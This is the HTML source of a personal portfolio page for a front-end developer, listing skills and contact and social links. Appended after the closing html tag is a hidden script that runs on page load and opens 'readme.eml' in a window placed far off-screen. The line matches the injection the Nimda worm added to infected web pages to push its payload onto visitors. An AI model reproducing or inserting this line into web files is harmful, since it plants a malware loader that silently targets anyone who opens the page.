<!DOCTYPE html>
<html>
<head>
	<title>Gourav Kumar</title>
	<link rel="stylesheet" type="text/css" href="css/master.css">
	<link rel="icon" type="text/css" href="favicon.ico">
</head>
<body>
<div class="top-container">
	<img class="top-cloud"src="image/clouds.png" alt="cloud-img"><br>
	<div class="txt">
	<h1>Hello I'm Gourav</h1>
	<p>I'm Frontend Developer</p>
	<img class="middle-cloud" src="image/clouds.png" alt="cloud-img" height="100px">
	<img class="bottom-cloud" src="image/mountains.png">
	</div>
</div>

<div class="middle-container">
	<img class="em-image" src="image/em.png">
	<div class="project">
	<h3>Hi,</h3>
	<p class="p">I'm a web designer / developer based in Sirsa,India. I have a passion for web design and love to create for web and mobile devices.</p>
          <br><br>
	<a class="but" href="https://github.com/Gouravk96 ">My Project</a>
		
        </div>
	<hr>	

	<h1>What I Can Do.</h1>
	<img class="em1-image" src="image/em.png">
	<p class="p1" >Design what you want.
I like to keep it simple. My goals are to focus on typography,content and conveying the message that you want to send<p>
	<hr>
	     <div class="pd">
	       <h1>I Can Help</h1>
	        <h3>Currently i'm working on React js,HTML CSS, SCSS,Bootstrap,Adobe XD and Figma </h3>
            <p class="p">I'm a Front-End Developer for in Gurugram, India.
I have serious passion for creating attractive and new web and UI design for best user experiences.
<br>Let's make something special.</p>
            <br><br>
         <a class="but " href="mailto:gouravkumar201196@gmail.com">Message Me</a>
	    </div>
</div>

<div class="bottom-container">
	<a href="https://www.linkedin.com/in/gouravk96/">LinkedIn</a>
	<a href="https://www.facebook.com/gorav.josan">facebook</a>
	<p class="copywrite">&#9400 2020 Gourav Kumar &#9400 Kamboj</p>
</div>

</body>
</html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
